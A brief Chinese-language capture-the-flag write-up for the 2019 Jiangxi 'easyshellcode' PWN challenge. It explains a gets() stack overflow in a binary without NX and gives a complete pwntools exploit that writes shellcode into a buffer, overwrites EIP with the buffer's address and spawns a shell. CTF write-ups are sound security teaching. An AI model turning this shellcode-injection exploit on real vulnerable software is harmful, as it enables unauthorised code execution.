火种CTF 2019年江西高校网络安全大赛 PWN easyshellcode writeup

检查一下程序保护机制

没有开启NX,也有RWX可读可写可执行的段
将程序拖入IDA

可以看到gets(&s)这里存在溢出漏洞,会将s字符复制0x64字节给buf2
利用思路:
＊＊将shellcode写到&s,再填充A覆盖只EIP填入buf2的地址
＊＊这样执行EIP的时候即是执行buf2里面的shellcode

获取到buf2的地址

exploit如下:

#coding:utf-8
from pwn import *

sh = process('./easyshellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804A060
sh.sendline(shellcode+"A"*(112-len(shellcode))+ p32(buf2_addr))
sh.interactive()

欢迎爱好CTF的小伙伴一起交流